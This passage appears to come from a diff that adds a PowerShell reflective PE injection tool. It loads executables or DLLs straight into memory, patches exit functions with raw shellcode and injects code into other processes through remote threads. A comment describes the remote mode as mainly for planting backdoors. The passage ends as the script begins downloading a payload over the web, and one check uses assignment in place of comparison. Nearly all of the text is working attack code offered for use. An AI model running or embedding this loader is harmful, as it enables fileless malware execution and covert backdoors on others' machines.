[UInt32]($Win32Constants.PAGE_EXECUTE_READWRITE), [Ref]$OldProtectFlag) + if ($Success = $false) + { + throw "Call to VirtualProtect failed" + } + [System.Runtime.InteropServices.Marshal]::StructureToPtr($NewWCmdLnPtr, $WCmdLnAddr, $false) + $Win32Functions.VirtualProtect.Invoke($WCmdLnAddr, [UInt32]$PtrSize, [UInt32]($OldProtectFlag), [Ref]$OldProtectFlag) | Out-Null + } + } + ################################################# + + + ################################################# + #Next overwrite CorExitProcess and ExitProcess to instead ExitThread. This way the entire Powershell process doesn't die when the EXE exits. + + $ReturnArray = @() + $ExitFunctions = @() #Array of functions to overwrite so the thread doesn't exit the process + + #CorExitProcess (compiled in to visual studio c++) + [IntPtr]$MscoreeHandle = $Win32Functions.GetModuleHandle.Invoke("mscoree.dll") + if ($MscoreeHandle -eq [IntPtr]::Zero) + { + throw "mscoree handle null" + } + [IntPtr]$CorExitProcessAddr = $Win32Functions.GetProcAddress.Invoke($MscoreeHandle, "CorExitProcess") + if ($CorExitProcessAddr -eq [IntPtr]::Zero) + { + Throw "CorExitProcess address not found" + } + $ExitFunctions += $CorExitProcessAddr + + #ExitProcess (what non-managed programs use) + [IntPtr]$ExitProcessAddr = $Win32Functions.GetProcAddress.Invoke($Kernel32Handle, "ExitProcess") + if ($ExitProcessAddr -eq [IntPtr]::Zero) + { + Throw "ExitProcess address not found" + } + $ExitFunctions += $ExitProcessAddr + + [UInt32]$OldProtectFlag = 0 + foreach ($ProcExitFunctionAddr in $ExitFunctions) + { + $ProcExitFunctionAddrTmp = $ProcExitFunctionAddr + #The following is the shellcode (Shellcode: ExitThread.asm): + #32bit shellcode + [Byte[]]$Shellcode1 = @(0xbb) + [Byte[]]$Shellcode2 = @(0xc6, 0x03, 0x01, 0x83, 0xec, 0x20, 0x83, 0xe4, 0xc0, 0xbb) + #64bit shellcode (Shellcode: ExitThread.asm) + if ($PtrSize -eq 8) + { + [Byte[]]$Shellcode1 = @(0x48, 0xbb) + [Byte[]]$Shellcode2 = @(0xc6, 0x03, 0x01, 0x48, 0x83, 0xec, 0x20, 0x66, 0x83, 0xe4, 0xc0, 0x48, 0xbb) + } + [Byte[]]$Shellcode3 = @(0xff, 0xd3) + $TotalSize = $Shellcode1.Length + $PtrSize + $Shellcode2.Length + $PtrSize + $Shellcode3.Length + + [IntPtr]$ExitThreadAddr = $Win32Functions.GetProcAddress.Invoke($Kernel32Handle, "ExitThread") + if ($ExitThreadAddr -eq [IntPtr]::Zero) + { + Throw "ExitThread address not found" + } + + $Success = $Win32Functions.VirtualProtect.Invoke($ProcExitFunctionAddr, [UInt32]$TotalSize, [UInt32]$Win32Constants.PAGE_EXECUTE_READWRITE, [Ref]$OldProtectFlag) + if ($Success -eq $false) + { + Throw "Call to VirtualProtect failed" + } + + #Make copy of original ExitProcess bytes + $ExitProcessOrigBytesPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TotalSize) + $Win32Functions.memcpy.Invoke($ExitProcessOrigBytesPtr, $ProcExitFunctionAddr, [UInt64]$TotalSize) | Out-Null + $ReturnArray += ,($ProcExitFunctionAddr, $ExitProcessOrigBytesPtr, $TotalSize) + + #Write the ExitThread shellcode to memory. This shellcode will write 0x01 to ExeDoneBytePtr address (so PS knows the EXE is done), then + # call ExitThread + Write-BytesToMemory -Bytes $Shellcode1 -MemoryAddress $ProcExitFunctionAddrTmp + $ProcExitFunctionAddrTmp = Add-SignedIntAsUnsigned $ProcExitFunctionAddrTmp ($Shellcode1.Length) + [System.Runtime.InteropServices.Marshal]::StructureToPtr($ExeDoneBytePtr, $ProcExitFunctionAddrTmp, $false) + $ProcExitFunctionAddrTmp = Add-SignedIntAsUnsigned $ProcExitFunctionAddrTmp $PtrSize + Write-BytesToMemory -Bytes $Shellcode2 -MemoryAddress $ProcExitFunctionAddrTmp + $ProcExitFunctionAddrTmp = Add-SignedIntAsUnsigned $ProcExitFunctionAddrTmp ($Shellcode2.Length) + [System.Runtime.InteropServices.Marshal]::StructureToPtr($ExitThreadAddr, $ProcExitFunctionAddrTmp, $false) + $ProcExitFunctionAddrTmp = Add-SignedIntAsUnsigned $ProcExitFunctionAddrTmp $PtrSize + Write-BytesToMemory -Bytes $Shellcode3 -MemoryAddress $ProcExitFunctionAddrTmp + + $Win32Functions.VirtualProtect.Invoke($ProcExitFunctionAddr, [UInt32]$TotalSize, [UInt32]$OldProtectFlag, [Ref]$OldProtectFlag) | Out-Null + } + ################################################# + + Write-Output $ReturnArray + } + + + #This function takes an array of arrays, the inner array of format @($DestAddr, $SourceAddr, $Count) + # It copies Count bytes from Source to Destination. + Function Copy-ArrayOfMemAddresses + { + Param( + [Parameter(Position = 0, Mandatory = $true)] + [Array[]] + $CopyInfo, + + [Parameter(Position = 1, Mandatory = $true)] + [System.Object] + $Win32Functions, + + [Parameter(Position = 2, Mandatory = $true)] + [System.Object] + $Win32Constants + ) + + [UInt32]$OldProtectFlag = 0 + foreach ($Info in $CopyInfo) + { + $Success = $Win32Functions.VirtualProtect.Invoke($Info[0], [UInt32]$Info[2], [UInt32]$Win32Constants.PAGE_EXECUTE_READWRITE, [Ref]$OldProtectFlag) + if ($Success -eq $false) + { + Throw "Call to VirtualProtect failed" + } + + $Win32Functions.memcpy.Invoke($Info[0], $Info[1], [UInt64]$Info[2]) | Out-Null + + $Win32Functions.VirtualProtect.Invoke($Info[0], [UInt32]$Info[2], [UInt32]$OldProtectFlag, [Ref]$OldProtectFlag) | Out-Null + } + } + + + ##################################### + ########## FUNCTIONS ########### + ##################################### + Function Get-MemoryProcAddress + { + Param( + [Parameter(Position = 0, Mandatory = $true)] + [IntPtr] + $PEHandle, + + [Parameter(Position = 1, Mandatory = $true)] + [String] + $FunctionName + ) + + $Win32Types = Get-Win32Types + $Win32Constants = Get-Win32Constants + $PEInfo = Get-PEDetailedInfo -PEHandle $PEHandle -Win32Types $Win32Types -Win32Constants $Win32Constants + + #Get the export table + if ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.ExportTable.Size -eq 0) + { + return [IntPtr]::Zero + } + $ExportTablePtr = Add-SignedIntAsUnsigned ($PEHandle) ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.ExportTable.VirtualAddress) + $ExportTable = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ExportTablePtr, $Win32Types.IMAGE_EXPORT_DIRECTORY) + + for ($i = 0; $i -lt $ExportTable.NumberOfNames; $i++) + { + #AddressOfNames is an array of pointers to strings of the names of the functions exported + $NameOffsetPtr = Add-SignedIntAsUnsigned ($PEHandle) ($ExportTable.AddressOfNames + ($i * [System.Runtime.InteropServices.Marshal]::SizeOf([UInt32]))) + $NamePtr = Add-SignedIntAsUnsigned ($PEHandle) ([System.Runtime.InteropServices.Marshal]::PtrToStructure($NameOffsetPtr, [UInt32])) + $Name = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi($NamePtr) + + if ($Name -ceq $FunctionName) + { + #AddressOfNameOrdinals is a table which contains points to a WORD which is the index in to AddressOfFunctions + # which contains the offset of the function in to the DLL + $OrdinalPtr = Add-SignedIntAsUnsigned ($PEHandle) ($ExportTable.AddressOfNameOrdinals + ($i * [System.Runtime.InteropServices.Marshal]::SizeOf([UInt16]))) + $FuncIndex = [System.Runtime.InteropServices.Marshal]::PtrToStructure($OrdinalPtr, [UInt16]) + $FuncOffsetAddr = Add-SignedIntAsUnsigned ($PEHandle) ($ExportTable.AddressOfFunctions + ($FuncIndex * [System.Runtime.InteropServices.Marshal]::SizeOf([UInt32]))) + $FuncOffset = [System.Runtime.InteropServices.Marshal]::PtrToStructure($FuncOffsetAddr, [UInt32]) + return Add-SignedIntAsUnsigned ($PEHandle) ($FuncOffset) + } + } + + return [IntPtr]::Zero + } + + + Function Invoke-MemoryLoadLibrary + { + Param( + [Parameter( Position = 0, Mandatory = $true )] + [Byte[]] + $PEBytes, + + [Parameter(Position = 1, Mandatory = $false)] + [String] + $ExeArgs, + + [Parameter(Position = 2, Mandatory = $false)] + [IntPtr] + $RemoteProcHandle + ) + + $PtrSize = [System.Runtime.InteropServices.Marshal]::SizeOf([IntPtr]) + + #Get Win32 constants and functions + $Win32Constants = Get-Win32Constants + $Win32Functions = Get-Win32Functions + $Win32Types = Get-Win32Types + + $RemoteLoading = $false + if (($RemoteProcHandle -ne $null) -and ($RemoteProcHandle -ne [IntPtr]::Zero)) + { + $RemoteLoading = $true + } + + #Get basic PE information + Write-Verbose "Getting basic PE information from the file" + $PEInfo = Get-PEBasicInfo -PEBytes $PEBytes -Win32Types $Win32Types + $OriginalImageBase = $PEInfo.OriginalImageBase + $NXCompatible = $true + if (($PEInfo.DllCharacteristics -band $Win32Constants.IMAGE_DLLCHARACTERISTICS_NX_COMPAT) -ne $Win32Constants.IMAGE_DLLCHARACTERISTICS_NX_COMPAT) + { + Write-Warning "PE is not compatible with DEP, might cause issues" -WarningAction Continue + $NXCompatible = $false + } + + + #Verify that the PE and the current process are the same bits (32bit or 64bit) + $Process64Bit = $true + if ($RemoteLoading -eq $true) + { + $Kernel32Handle = $Win32Functions.GetModuleHandle.Invoke("kernel32.dll") + $Result = $Win32Functions.GetProcAddress.Invoke($Kernel32Handle, "IsWow64Process") + if ($Result -eq [IntPtr]::Zero) + { + Throw "Couldn't locate IsWow64Process function to determine if target process is 32bit or 64bit" + } + + [Bool]$Wow64Process = $false + $Success = $Win32Functions.IsWow64Process.Invoke($RemoteProcHandle, [Ref]$Wow64Process) + if ($Success -eq $false) + { + Throw "Call to IsWow64Process failed" + } + + if (($Wow64Process -eq $true) -or (($Wow64Process -eq $false) -and ([System.Runtime.InteropServices.Marshal]::SizeOf([IntPtr]) -eq 4))) + { + $Process64Bit = $false + } + + #PowerShell needs to be same bit as the PE being loaded for IntPtr to work correctly + $PowerShell64Bit = $true + if ([System.Runtime.InteropServices.Marshal]::SizeOf([IntPtr]) -ne 8) + { + $PowerShell64Bit = $false + } + if ($PowerShell64Bit -ne $Process64Bit) + { + throw "PowerShell must be same architecture (x86/x64) as PE being loaded and remote process" + } + } + else + { + if ([System.Runtime.InteropServices.Marshal]::SizeOf([IntPtr]) -ne 8) + { + $Process64Bit = $false + } + } + if ($Process64Bit -ne $PEInfo.PE64Bit) + { + Throw "PE platform doesn't match the architecture of the process it is being loaded in (32/64bit)" + } + + + #Allocate memory and write the PE to memory. If the PE supports ASLR, allocate to a random memory address + Write-Verbose "Allocating memory for the PE and write its headers to memory" + + [IntPtr]$LoadAddr = [IntPtr]::Zero + if (($PEInfo.DllCharacteristics -band $Win32Constants.IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE) -ne $Win32Constants.IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE) + { + Write-Warning "PE file being reflectively loaded is not ASLR compatible. If the loading fails, try restarting PowerShell and trying again" -WarningAction Continue + [IntPtr]$LoadAddr = $OriginalImageBase + } + + $PEHandle = [IntPtr]::Zero #This is where the PE is allocated in PowerShell + $EffectivePEHandle = [IntPtr]::Zero #This is the address the PE will be loaded to. If it is loaded in PowerShell, this equals $PEHandle. If it is loaded in a remote process, this is the address in the remote process. + if ($RemoteLoading -eq $true) + { + #Allocate space in the remote process, and also allocate space in PowerShell. The PE will be setup in PowerShell and copied to the remote process when it is setup + $PEHandle = $Win32Functions.VirtualAlloc.Invoke([IntPtr]::Zero, [UIntPtr]$PEInfo.SizeOfImage, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_READWRITE) + + #todo, error handling needs to delete this memory if an error happens along the way + $EffectivePEHandle = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, $LoadAddr, [UIntPtr]$PEInfo.SizeOfImage, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_EXECUTE_READWRITE) + if ($EffectivePEHandle -eq [IntPtr]::Zero) + { + Throw "Unable to allocate memory in the remote process. If the PE being loaded doesn't support ASLR, it could be that the requested base address of the PE is already in use" + } + } + else + { + if ($NXCompatible -eq $true) + { + $PEHandle = $Win32Functions.VirtualAlloc.Invoke($LoadAddr, [UIntPtr]$PEInfo.SizeOfImage, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_READWRITE) + } + else + { + $PEHandle = $Win32Functions.VirtualAlloc.Invoke($LoadAddr, [UIntPtr]$PEInfo.SizeOfImage, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_EXECUTE_READWRITE) + } + $EffectivePEHandle = $PEHandle + } + + [IntPtr]$PEEndAddress = Add-SignedIntAsUnsigned ($PEHandle) ([Int64]$PEInfo.SizeOfImage) + if ($PEHandle -eq [IntPtr]::Zero) + { + Throw "VirtualAlloc failed to allocate memory for PE. If PE is not ASLR compatible, try running the script in a new PowerShell process (the new PowerShell process will have a different memory layout, so the address the PE wants might be free)." + } + [System.Runtime.InteropServices.Marshal]::Copy($PEBytes, 0, $PEHandle, $PEInfo.SizeOfHeaders) | Out-Null + + + #Now that the PE is in memory, get more detailed information about it + Write-Verbose "Getting detailed PE information from the headers loaded in memory" + $PEInfo = Get-PEDetailedInfo -PEHandle $PEHandle -Win32Types $Win32Types -Win32Constants $Win32Constants + $PEInfo | Add-Member -MemberType NoteProperty -Name EndAddress -Value $PEEndAddress + $PEInfo | Add-Member -MemberType NoteProperty -Name EffectivePEHandle -Value $EffectivePEHandle + Write-Verbose "StartAddress: $PEHandle EndAddress: $PEEndAddress" + + + #Copy each section from the PE in to memory + Write-Verbose "Copy PE sections in to memory" + Copy-Sections -PEBytes $PEBytes -PEInfo $PEInfo -Win32Functions $Win32Functions -Win32Types $Win32Types + + + #Update the memory addresses hardcoded in to the PE based on the memory address the PE was expecting to be loaded to vs where it was actually loaded + Write-Verbose "Update memory addresses based on where the PE was actually loaded in memory" + Update-MemoryAddresses -PEInfo $PEInfo -OriginalImageBase $OriginalImageBase -Win32Constants $Win32Constants -Win32Types $Win32Types + + + #The PE we are in-memory loading has DLLs it needs, import those DLLs for it + Write-Verbose "Import DLL's needed by the PE we are loading" + if ($RemoteLoading -eq $true) + { + Import-DllImports -PEInfo $PEInfo -Win32Functions $Win32Functions -Win32Types $Win32Types -Win32Constants $Win32Constants -RemoteProcHandle $RemoteProcHandle + } + else + { + Import-DllImports -PEInfo $PEInfo -Win32Functions $Win32Functions -Win32Types $Win32Types -Win32Constants $Win32Constants + } + + + #Update the memory protection flags for all the memory just allocated + if ($RemoteLoading -eq $false) + { + if ($NXCompatible -eq $true) + { + Write-Verbose "Update memory protection flags" + Update-MemoryProtectionFlags -PEInfo $PEInfo -Win32Functions $Win32Functions -Win32Constants $Win32Constants -Win32Types $Win32Types + } + else + { + Write-Verbose "PE being reflectively loaded is not compatible with NX memory, keeping memory as read write execute" + } + } + else + { + Write-Verbose "PE being loaded in to a remote process, not adjusting memory permissions" + } + + + #If remote loading, copy the DLL in to remote process memory + if ($RemoteLoading -eq $true) + { + [UInt32]$NumBytesWritten = 0 + $Success = $Win32Functions.WriteProcessMemory.Invoke($RemoteProcHandle, $EffectivePEHandle, $PEHandle, [UIntPtr]($PEInfo.SizeOfImage), [Ref]$NumBytesWritten) + if ($Success -eq $false) + { + Throw "Unable to write shellcode to remote process memory." + } + } + + + #Call the entry point, if this is a DLL the entrypoint is the DllMain function, if it is an EXE it is the Main function + if ($PEInfo.FileType -ieq "DLL") + { + if ($RemoteLoading -eq $false) + { + Write-Verbose "Calling dllmain so the DLL knows it has been loaded" + $DllMainPtr = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.AddressOfEntryPoint) + $DllMainDelegate = Get-DelegateType @([IntPtr], [UInt32], [IntPtr]) ([Bool]) + $DllMain = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DllMainPtr, $DllMainDelegate) + + $DllMain.Invoke($PEInfo.PEHandle, 1, [IntPtr]::Zero) | Out-Null + } + else + { + $DllMainPtr = Add-SignedIntAsUnsigned ($EffectivePEHandle) ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.AddressOfEntryPoint) + + if ($PEInfo.PE64Bit -eq $true) + { + #Shellcode: CallDllMain.asm + $CallDllMainSC1 = @(0x53, 0x48, 0x89, 0xe3, 0x66, 0x83, 0xe4, 0x00, 0x48, 0xb9) + $CallDllMainSC2 = @(0xba, 0x01, 0x00, 0x00, 0x00, 0x41, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x48, 0xb8) + $CallDllMainSC3 = @(0xff, 0xd0, 0x48, 0x89, 0xdc, 0x5b, 0xc3) + } + else + { + #Shellcode: CallDllMain.asm + $CallDllMainSC1 = @(0x53, 0x89, 0xe3, 0x83, 0xe4, 0xf0, 0xb9) + $CallDllMainSC2 = @(0xba, 0x01, 0x00, 0x00, 0x00, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x50, 0x52, 0x51, 0xb8) + $CallDllMainSC3 = @(0xff, 0xd0, 0x89, 0xdc, 0x5b, 0xc3) + } + $SCLength = $CallDllMainSC1.Length + $CallDllMainSC2.Length + $CallDllMainSC3.Length + ($PtrSize * 2) + $SCPSMem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($SCLength) + $SCPSMemOriginal = $SCPSMem + + Write-BytesToMemory -Bytes $CallDllMainSC1 -MemoryAddress $SCPSMem + $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($CallDllMainSC1.Length) + [System.Runtime.InteropServices.Marshal]::StructureToPtr($EffectivePEHandle, $SCPSMem, $false) + $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize) + Write-BytesToMemory -Bytes $CallDllMainSC2 -MemoryAddress $SCPSMem + $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($CallDllMainSC2.Length) + [System.Runtime.InteropServices.Marshal]::StructureToPtr($DllMainPtr, $SCPSMem, $false) + $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize) + Write-BytesToMemory -Bytes $CallDllMainSC3 -MemoryAddress $SCPSMem + $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($CallDllMainSC3.Length) + + $RSCAddr = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, [UIntPtr][UInt64]$SCLength, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_EXECUTE_READWRITE) + if ($RSCAddr -eq [IntPtr]::Zero) + { + Throw "Unable to allocate memory in the remote process for shellcode" + } + + $Success = $Win32Functions.WriteProcessMemory.Invoke($RemoteProcHandle, $RSCAddr, $SCPSMemOriginal, [UIntPtr][UInt64]$SCLength, [Ref]$NumBytesWritten) + if (($Success -eq $false) -or ([UInt64]$NumBytesWritten -ne [UInt64]$SCLength)) + { + Throw "Unable to write shellcode to remote process memory." + } + + $RThreadHandle = Invoke-CreateRemoteThread -ProcessHandle $RemoteProcHandle -StartAddress $RSCAddr -Win32Functions $Win32Functions + $Result = $Win32Functions.WaitForSingleObject.Invoke($RThreadHandle, 20000) + if ($Result -ne 0) + { + Throw "Call to CreateRemoteThread to call GetProcAddress failed." + } + + $Win32Functions.VirtualFreeEx.Invoke($RemoteProcHandle, $RSCAddr, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null + } + } + elseif ($PEInfo.FileType -ieq "EXE") + { + #Overwrite GetCommandLine and ExitProcess so we can provide our own arguments to the EXE and prevent it from killing the PS process + [IntPtr]$ExeDoneBytePtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal(1) + [System.Runtime.InteropServices.Marshal]::WriteByte($ExeDoneBytePtr, 0, 0x00) + $OverwrittenMemInfo = Update-ExeFunctions -PEInfo $PEInfo -Win32Functions $Win32Functions -Win32Constants $Win32Constants -ExeArguments $ExeArgs -ExeDoneBytePtr $ExeDoneBytePtr + + #If this is an EXE, call the entry point in a new thread. We have overwritten the ExitProcess function to instead ExitThread + # This way the reflectively loaded EXE won't kill the powershell process when it exits, it will just kill its own thread. + [IntPtr]$ExeMainPtr = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.AddressOfEntryPoint) + Write-Verbose "Call EXE Main function. Address: $ExeMainPtr. Creating thread for the EXE to run in." + + $Win32Functions.CreateThread.Invoke([IntPtr]::Zero, [IntPtr]::Zero, $ExeMainPtr, [IntPtr]::Zero, ([UInt32]0), [Ref]([UInt32]0)) | Out-Null + + while($true) + { + [Byte]$ThreadDone = [System.Runtime.InteropServices.Marshal]::ReadByte($ExeDoneBytePtr, 0) + if ($ThreadDone -eq 1) + { + Copy-ArrayOfMemAddresses -CopyInfo $OverwrittenMemInfo -Win32Functions $Win32Functions -Win32Constants $Win32Constants + Write-Verbose "EXE thread has completed." + break + } + else + { + Start-Sleep -Seconds 1 + } + } + } + + return @($PEInfo.PEHandle, $EffectivePEHandle) + } + + + Function Invoke-MemoryFreeLibrary + { + Param( + [Parameter(Position=0, Mandatory=$true)] + [IntPtr] + $PEHandle + ) + + #Get Win32 constants and functions + $Win32Constants = Get-Win32Constants + $Win32Functions = Get-Win32Functions + $Win32Types = Get-Win32Types + + $PEInfo = Get-PEDetailedInfo -PEHandle $PEHandle -Win32Types $Win32Types -Win32Constants $Win32Constants + + #Call FreeLibrary for all the imports of the DLL + if ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.ImportTable.Size -gt 0) + { + [IntPtr]$ImportDescriptorPtr = Add-SignedIntAsUnsigned ([Int64]$PEInfo.PEHandle) ([Int64]$PEInfo.IMAGE_NT_HEADERS.OptionalHeader.ImportTable.VirtualAddress) + + while ($true) + { + $ImportDescriptor = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ImportDescriptorPtr, $Win32Types.IMAGE_IMPORT_DESCRIPTOR) + + #If the structure is null, it signals that this is the end of the array + if ($ImportDescriptor.Characteristics -eq 0 ` + -and $ImportDescriptor.FirstThunk -eq 0 ` + -and $ImportDescriptor.ForwarderChain -eq 0 ` + -and $ImportDescriptor.Name -eq 0 ` + -and $ImportDescriptor.TimeDateStamp -eq 0) + { + Write-Verbose "Done unloading the libraries needed by the PE" + break + } + + $ImportDllPath = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi((Add-SignedIntAsUnsigned ([Int64]$PEInfo.PEHandle) ([Int64]$ImportDescriptor.Name))) + $ImportDllHandle = $Win32Functions.GetModuleHandle.Invoke($ImportDllPath) + + if ($ImportDllHandle -eq $null) + { + Write-Warning "Error getting DLL handle in MemoryFreeLibrary, DLLName: $ImportDllPath. Continuing anyways" -WarningAction Continue + } + + $Success = $Win32Functions.FreeLibrary.Invoke($ImportDllHandle) + if ($Success -eq $false) + { + Write-Warning "Unable to free library: $ImportDllPath. Continuing anyways." -WarningAction Continue + } + + $ImportDescriptorPtr = Add-SignedIntAsUnsigned ($ImportDescriptorPtr) ([System.Runtime.InteropServices.Marshal]::SizeOf($Win32Types.IMAGE_IMPORT_DESCRIPTOR)) + } + } + + $Success = $Win32Functions.VirtualFree.Invoke($PEHandle, [UInt64]0, $Win32Constants.MEM_RELEASE) + if ($Success -eq $false) + { + Write-Warning "Unable to call VirtualFree on the PE's memory. Continuing anyways." -WarningAction Continue + } + } + + + Function Main + { + $Win32Functions = Get-Win32Functions + $Win32Types = Get-Win32Types + $Win32Constants = Get-Win32Constants + + $RemoteProcHandle = [IntPtr]::Zero + + #If a remote process to inject in to is specified, get a handle to it + if (($ProcId -ne $null) -and ($ProcId -ne 0) -and ($ProcName -ne $null) -and ($ProcName -ne "")) + { + Throw "Can't supply a ProcId and ProcName, choose one or the other" + } + elseif ($ProcName -ne $null -and $ProcName -ne "") + { + $Processes = @(Get-Process -Name $ProcName -ErrorAction SilentlyContinue) + if ($Processes.Count -eq 0) + { + Throw "Can't find process $ProcName" + } + elseif ($Processes.Count -gt 1) + { + $ProcInfo = Get-Process | where { $_.Name -eq $ProcName } | Select-Object ProcessName, Id, SessionId + Write-Output $ProcInfo + Throw "More than one instance of $ProcName found, please specify the process ID to inject in to." + } + else + { + $ProcId = $Processes[0].ID + } + } + + #Just realized that PowerShell launches with SeDebugPrivilege for some reason.. So this isn't needed. Keeping it around just incase it is needed in the future. + #If the script isn't running in the same Windows logon session as the target, get SeDebugPrivilege + # if ((Get-Process -Id $PID).SessionId -ne (Get-Process -Id $ProcId).SessionId) + # { + # Write-Verbose "Getting SeDebugPrivilege" + # Enable-SeDebugPrivilege -Win32Functions $Win32Functions -Win32Types $Win32Types -Win32Constants $Win32Constants + # } + + if (($ProcId -ne $null) -and ($ProcId -ne 0)) + { + $RemoteProcHandle = $Win32Functions.OpenProcess.Invoke(0x001F0FFF, $false, $ProcId) + if ($RemoteProcHandle -eq [IntPtr]::Zero) + { + Throw "Couldn't obtain the handle for process ID: $ProcId" + } + + Write-Verbose "Got the handle for the remote process to inject in to" + } + + + #Load the PE reflectively + Write-Verbose "Calling Invoke-MemoryLoadLibrary" + $PEHandle = [IntPtr]::Zero + if ($RemoteProcHandle -eq [IntPtr]::Zero) + { + $PELoadedInfo = Invoke-MemoryLoadLibrary -PEBytes $PEBytes -ExeArgs $ExeArgs + } + else + { + $PELoadedInfo = Invoke-MemoryLoadLibrary -PEBytes $PEBytes -ExeArgs $ExeArgs -RemoteProcHandle $RemoteProcHandle + } + if ($PELoadedInfo -eq [IntPtr]::Zero) + { + Throw "Unable to load PE, handle returned is NULL" + } + + $PEHandle = $PELoadedInfo[0] + $RemotePEHandle = $PELoadedInfo[1] #only matters if you loaded in to a remote process + + + #Check if EXE or DLL. If EXE, the entry point was already called and we can now return. If DLL, call user function. + $PEInfo = Get-PEDetailedInfo -PEHandle $PEHandle -Win32Types $Win32Types -Win32Constants $Win32Constants + if (($PEInfo.FileType -ieq "DLL") -and ($RemoteProcHandle -eq [IntPtr]::Zero)) + { + ######################################### + ### YOUR CODE GOES HERE + ######################################### + switch ($FuncReturnType) + { + 'WString' { + Write-Verbose "Calling function with WString return type" + [IntPtr]$WStringFuncAddr = Get-MemoryProcAddress -PEHandle $PEHandle -FunctionName "WStringFunc" + if ($WStringFuncAddr -eq [IntPtr]::Zero) + { + Throw "Couldn't find function address." + } + $WStringFuncDelegate = Get-DelegateType @() ([IntPtr]) + $WStringFunc = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WStringFuncAddr, $WStringFuncDelegate) + [IntPtr]$OutputPtr = $WStringFunc.Invoke() + $Output = [System.Runtime.InteropServices.Marshal]::PtrToStringUni($OutputPtr) + Write-Output $Output + } + + 'String' { + Write-Verbose "Calling function with String return type" + [IntPtr]$StringFuncAddr = Get-MemoryProcAddress -PEHandle $PEHandle -FunctionName "StringFunc" + if ($StringFuncAddr -eq [IntPtr]::Zero) + { + Throw "Couldn't find function address." + } + $StringFuncDelegate = Get-DelegateType @() ([IntPtr]) + $StringFunc = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($StringFuncAddr, $StringFuncDelegate) + [IntPtr]$OutputPtr = $StringFunc.Invoke() + $Output = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi($OutputPtr) + Write-Output $Output + } + + 'Void' { + Write-Verbose "Calling function with Void return type" + [IntPtr]$VoidFuncAddr = Get-MemoryProcAddress -PEHandle $PEHandle -FunctionName "VoidFunc" + if ($VoidFuncAddr -eq [IntPtr]::Zero) + { + Throw "Couldn't find function address." + } + $VoidFuncDelegate = Get-DelegateType @() ([Void]) + $VoidFunc = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VoidFuncAddr, $VoidFuncDelegate) + $VoidFunc.Invoke() | Out-Null + } + } + ######################################### + ### END OF YOUR CODE + ######################################### + } + #For remote DLL injection, call a void function which takes no parameters + elseif (($PEInfo.FileType -ieq "DLL") -and ($RemoteProcHandle -ne [IntPtr]::Zero)) + { + $VoidFuncAddr = Get-MemoryProcAddress -PEHandle $PEHandle -FunctionName "VoidFunc" + if (($VoidFuncAddr -eq $null) -or ($VoidFuncAddr -eq [IntPtr]::Zero)) + { + Throw "VoidFunc couldn't be found in the DLL" + } + + $VoidFuncAddr = Sub-SignedIntAsUnsigned $VoidFuncAddr $PEHandle + $VoidFuncAddr = Add-SignedIntAsUnsigned $VoidFuncAddr $RemotePEHandle + + #Create the remote thread, don't wait for it to return.. This will probably mainly be used to plant backdoors + $RThreadHandle = Invoke-CreateRemoteThread -ProcessHandle $RemoteProcHandle -StartAddress $VoidFuncAddr -Win32Functions $Win32Functions + } + + #Don't free a library if it is injected in a remote process + if ($RemoteProcHandle -eq [IntPtr]::Zero) + { + Invoke-MemoryFreeLibrary -PEHandle $PEHandle + } + else + { + #Just delete the memory allocated in PowerShell to build the PE before injecting to remote process + $Success = $Win32Functions.VirtualFree.Invoke($PEHandle, [UInt64]0, $Win32Constants.MEM_RELEASE) + if ($Success -eq $false) + { + Write-Warning "Unable to call VirtualFree on the PE's memory. Continuing anyways." -WarningAction Continue + } + } + + Write-Verbose "Done!" + } + + Main + } + + #Main function to either run the script locally or remotely + Function Main + { + if (($PSCmdlet.MyInvocation.BoundParameters["Debug"] -ne $null) -and $PSCmdlet.MyInvocation.BoundParameters["Debug"].IsPresent) + { + $DebugPreference = "Continue" + } + + Write-Verbose "PowerShell ProcessID: $PID" + + [Byte[]]$PEBytes = $null + + if ($PsCmdlet.ParameterSetName -ieq "LocalFile") + { + Get-ChildItem $PEPath -ErrorAction Stop | Out-Null + [Byte[]]$PEBytes = [System.IO.File]::ReadAllBytes((Resolve-Path $PEPath)) + } + else + { + $WebClient = New-Object System.Net.WebClient + + [Byte[]]$PEBytes = 